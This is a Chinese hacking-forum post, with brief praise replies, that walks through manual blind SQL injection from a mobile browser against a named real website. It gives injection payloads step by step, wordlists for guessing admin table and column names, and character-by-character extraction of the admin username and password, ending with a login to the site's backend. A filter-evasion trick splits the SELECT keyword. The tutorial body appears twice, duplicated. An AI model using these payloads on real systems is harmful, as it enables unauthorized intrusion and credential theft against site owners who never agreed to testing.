edit_note帖子
105
stars积分
1,087
event加入
2012-07-21
电脑网络
手机wap入侵网站教程
schedule发表于 2013-03-30 01:01:00
visibility查看 566
chat_bubble回复 4
#1 楼主
----------
很简单的方法,就是电脑黑客入侵站
点经常用的SQL注入,不过我们不是
用工具,而是手工注入,而且是用手
机浏览器手动注入!我们要用手机
自带的浏览器,UC是不行的!
今天我在我网站的友链里找到个叫
黑客导航的站点做测试,这个站的玉
米是:wap.q8y.cn,用手机自带的
浏览器打开,我们先判断哪个页面有
注入点,先随便点个页面: http://
wap.q8y.cn/lianjie.asp?id=14 ,然
后存这个页面为书签。接下来就是
要改书签,判断这个页面是否有注入
点了。好,那么我们就在这个书签的
地址后面加上“and 1=1”,也就是把
书签的地址改成: http://
wap.q8y.cn/lianjie.asp?id=14
and 1=1,然后访问这个书签没有出
现错误!我们初步判断是有注入点
的!接着试下在书签地址后面
加“and 1=2”,返回错误页面!我们
就是要它返回错误页面,这样就能进
一步证明这个页面存在注入点了!
对了,也可以在书签的地址后直接加
个单引号 “ ’ ”来判断,但是这个方法
易于防范,我不建议大家使用!现在
存在注入点的页面找到了,我们就继
续下一步的入侵工作
了,GOGOGOGO~~~
我们先判断管理员帐号所在的表名
吧,判断表名可以在书签后面加上:
and (sel空格ect> count(*) from
xxx)>0。分析下加上去的这句里
的“xxx”,这个“XXX”就是我们猜的
数据表的名称,如果它存在的话,页
面的内容不会改变,如果没有这个表
名,页面会返回错误或者干脆就是返
回一个空白的页面。判断对了当然
好,不对的时候就要不断的去猜、去
测试了!常用的管理员帐号所在的
数据表名有:
admin;a_admin;x_admin;m_
admin;adminuser;admin_user;
article_admin;administrator;
manage;manager;member;user;
users;Manage_User;user_*;
admin_user*;login!当然还
有其他的,这就要看设计数据库的人
员怎么设计的了。脑子放灵活点,也
是很好找到的!^_^
那么我把书签改成: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> count(*) from
admin)>0,页面正常显示,无任何错
误,代表我猜对了,管理员帐号所在
的数据表名就是:admin,运气好
吧,o(∩_∩)o...哈哈
判断对了表名就要判断管理员帐号
和密码是哪些字段名了,我们在书签
后面加上“and (sel空格ect> count
(xxx) from admin)”,分析下这
个:“admin”就是我们刚才猜出来
的表名了,这里的“xxx”就是我们要
猜的字段名,常用的字段名有:
USR; user; userid;
userpwd; userpasswd;
username; userpassword;
userpasswd; passwd;
name; pwd; password;
pwd1; id; okwiantgo; city;
adress; wind; 姓名; 用户;
帐号; 密码; 用户密码; 用户帐
号; 级别; 用户名; 会员; 会员
ID; 会员结束; 用户会员; 密码
问题; 密码答案; 真实姓名; 身
份; u_name;
adminpassword;
adminusername; adminpsw;
adminupass; administrators;
adminuser; adminpass;
adminname; user_name;
admin_name;
admin_password;
admin_pass; admin_psw;
admin_username;
admin_user; admin_pwd;
admin_id; admin_name;
admin_pass; usr_nusr; dw;
nc; uid; admin;
user_admin; POWER;
sysuser; ad; users; movie
请进入第二页继续学习!
这个也像猜表名一样,慢慢猜、慢慢
测试,直到成功!那就发挥您聪明的
脑袋瓜,从各方面搜集信息,利用社
会工程学的知识,在最短时间猜到它
吧!
我就把书签改成: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> countAmeivc
from admin)>0,打开后,页面无任
何错误,说明管理员帐号的字段名就
是:username了。接着我又修改
书签为: http://wap.q8y.cn/
lianjie.asp?id=14 and (sel空格
ect> count(password) from
admin)>0,访问后页面无任何错误,
说明我猜管理员的密码字段名也是
对的!
入侵到现在,我们得到了管理员帐号
所在的表名为:admin,帐号的字段
名为:username,密码的字段为:
password,接下来我们就要猜解管
理员帐号和密码的具体内容了!激动
吧?呵呵…其实这段比较麻烦,你得
有耐心的慢慢来!
这次我们把书签后面的内容修改成
什么呢:and (sel空格ect> asc
(mid(username,1,1) from
admin))>50,也就是把书签改成:
http://wap.q8y.cn/lianjie.asp?
id=14 and (sel空格ect> asc(mid
(username,1,1) from
admin))>100,访问后如果页面正
常,则说明username第一位的*值
大于100,接下来试试看: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> asc(mid
(username,1,1) from
admin))<150,返回正常则说明
username第一位的*值小于150。
以此类推,慢慢缩小范围,直到:
http://wap.q8y.cn/lianjie.asp?
id=14 and (sel空格ect> asc(mid
(username,1,1) from
admin))=121,证明第一位是ACS码
为121的字符,也就是y了!经过这
么长时间的猜测,我们终于得到管理
员帐号的第一位了,那接下来当然是
继续猜测它后来的了内容了!猜测
完了username的内容,我们就猜测
password的内容。
猜啊猜啊,花儿都谢了,手指也红了,
终于成功的猜到了username和
password的所有内容!接下来我
们就要猜测管理员的登录页面了,一
般的都是admin/
index.asp,admin/login.asp啊之
类的,这个要靠自己的经验去猜测
的!当然,你能记得一些常用的后台
也是比较好的。我就直接试下:
http://wap.q8y.cn/admin ,还真的
打开了!填上管理员帐号和密码,登
录,也就进了后台了!进后台了,想
怎么弄就怎么弄哦!希望大家学会
后不要去破坏别人的网站,我们的目
的是学技术保护自身,而不是去捣
乱!黑客契约不会轻易破话别人的
网站,但是对于敌人,我们也绝不会
心慈手软!!!
后注:
1,要学会手动SQL注入,必须学会简
单的SQL语句,这些我们的黑客论坛
有贴子教的,大家可以搜索下!
2,必须了解什么是ASC码!这些我
稍后我会在论坛补充!请搜索!
3,请不要恶意破坏别人的网站!请
把学到的技术用在正途、用在为国
争光上
很简单的方法,就是电脑黑客入侵站
点经常用的SQL注入,不过我们不是
用工具,而是手工注入,而且是用手
机浏览器手动注入!我们要用手机
自带的浏览器,UC是不行的!
今天我在我网站的友链里找到个叫
黑客导航的站点做测试,这个站的玉
米是:wap.q8y.cn,用手机自带的
浏览器打开,我们先判断哪个页面有
注入点,先随便点个页面: http://
wap.q8y.cn/lianjie.asp?id=14 ,然
后存这个页面为书签。接下来就是
要改书签,判断这个页面是否有注入
点了。好,那么我们就在这个书签的
地址后面加上“and 1=1”,也就是把
书签的地址改成: http://
wap.q8y.cn/lianjie.asp?id=14
and 1=1,然后访问这个书签没有出
现错误!我们初步判断是有注入点
的!接着试下在书签地址后面
加“and 1=2”,返回错误页面!我们
就是要它返回错误页面,这样就能进
一步证明这个页面存在注入点了!
对了,也可以在书签的地址后直接加
个单引号 “ ’ ”来判断,但是这个方法
易于防范,我不建议大家使用!现在
存在注入点的页面找到了,我们就继
续下一步的入侵工作
了,GOGOGOGO~~~
我们先判断管理员帐号所在的表名
吧,判断表名可以在书签后面加上:
and (sel空格ect> count(*) from
xxx)>0。分析下加上去的这句里
的“xxx”,这个“XXX”就是我们猜的
数据表的名称,如果它存在的话,页
面的内容不会改变,如果没有这个表
名,页面会返回错误或者干脆就是返
回一个空白的页面。判断对了当然
好,不对的时候就要不断的去猜、去
测试了!常用的管理员帐号所在的
数据表名有:
admin;a_admin;x_admin;m_
admin;adminuser;admin_user;
article_admin;administrator;
manage;manager;member;user;
users;Manage_User;user_*;
admin_user*;login!当然还
有其他的,这就要看设计数据库的人
员怎么设计的了。脑子放灵活点,也
是很好找到的!^_^
那么我把书签改成: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> count(*) from
admin)>0,页面正常显示,无任何错
误,代表我猜对了,管理员帐号所在
的数据表名就是:admin,运气好
吧,o(∩_∩)o...哈哈
判断对了表名就要判断管理员帐号
和密码是哪些字段名了,我们在书签
后面加上“and (sel空格ect> count
(xxx) from admin)”,分析下这
个:“admin”就是我们刚才猜出来
的表名了,这里的“xxx”就是我们要
猜的字段名,常用的字段名有:
USR; user; userid;
userpwd; userpasswd;
username; userpassword;
userpasswd; passwd;
name; pwd; password;
pwd1; id; okwiantgo; city;
adress; wind; 姓名; 用户;
帐号; 密码; 用户密码; 用户帐
号; 级别; 用户名; 会员; 会员
ID; 会员结束; 用户会员; 密码
问题; 密码答案; 真实姓名; 身
份; u_name;
adminpassword;
adminusername; adminpsw;
adminupass; administrators;
adminuser; adminpass;
adminname; user_name;
admin_name;
admin_password;
admin_pass; admin_psw;
admin_username;
admin_user; admin_pwd;
admin_id; admin_name;
admin_pass; usr_nusr; dw;
nc; uid; admin;
user_admin; POWER;
sysuser; ad; users; movie
请进入第二页继续学习!
这个也像猜表名一样,慢慢猜、慢慢
测试,直到成功!那就发挥您聪明的
脑袋瓜,从各方面搜集信息,利用社
会工程学的知识,在最短时间猜到它
吧!
我就把书签改成: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> countAmeivc
from admin)>0,打开后,页面无任
何错误,说明管理员帐号的字段名就
是:username了。接着我又修改
书签为: http://wap.q8y.cn/
lianjie.asp?id=14 and (sel空格
ect> count(password) from
admin)>0,访问后页面无任何错误,
说明我猜管理员的密码字段名也是
对的!
入侵到现在,我们得到了管理员帐号
所在的表名为:admin,帐号的字段
名为:username,密码的字段为:
password,接下来我们就要猜解管
理员帐号和密码的具体内容了!激动
吧?呵呵…其实这段比较麻烦,你得
有耐心的慢慢来!
这次我们把书签后面的内容修改成
什么呢:and (sel空格ect> asc
(mid(username,1,1) from
admin))>50,也就是把书签改成:
http://wap.q8y.cn/lianjie.asp?
id=14 and (sel空格ect> asc(mid
(username,1,1) from
admin))>100,访问后如果页面正
常,则说明username第一位的*值
大于100,接下来试试看: http://
wap.q8y.cn/lianjie.asp?id=14
and (sel空格ect> asc(mid
(username,1,1) from
admin))<150,返回正常则说明
username第一位的*值小于150。
以此类推,慢慢缩小范围,直到:
http://wap.q8y.cn/lianjie.asp?
id=14 and (sel空格ect> asc(mid
(username,1,1) from
admin))=121,证明第一位是ACS码
为121的字符,也就是y了!经过这
么长时间的猜测,我们终于得到管理
员帐号的第一位了,那接下来当然是
继续猜测它后来的了内容了!猜测
完了username的内容,我们就猜测
password的内容。
猜啊猜啊,花儿都谢了,手指也红了,
终于成功的猜到了username和
password的所有内容!接下来我
们就要猜测管理员的登录页面了,一
般的都是admin/
index.asp,admin/login.asp啊之
类的,这个要靠自己的经验去猜测
的!当然,你能记得一些常用的后台
也是比较好的。我就直接试下:
http://wap.q8y.cn/admin ,还真的
打开了!填上管理员帐号和密码,登
录,也就进了后台了!进后台了,想
怎么弄就怎么弄哦!希望大家学会
后不要去破坏别人的网站,我们的目
的是学技术保护自身,而不是去捣
乱!黑客契约不会轻易破话别人的
网站,但是对于敌人,我们也绝不会
心慈手软!!!
后注:
1,要学会手动SQL注入,必须学会简
单的SQL语句,这些我们的黑客论坛
有贴子教的,大家可以搜索下!
2,必须了解什么是ASC码!这些我
稍后我会在论坛补充!请搜索!
3,请不要恶意破坏别人的网站!请
把学到的技术用在正途、用在为国
争光上
全部回复 (4)
2013-03-30 06:37:00
沙发
楼主牛!
2013-03-30 07:26:00
板凳
不错呀,要的就是基础
2013-03-30 10:26:00
地板
*
2013-04-05 14:39:00
#5
你牛,我顶!
登录 后才能回复
flag举报帖子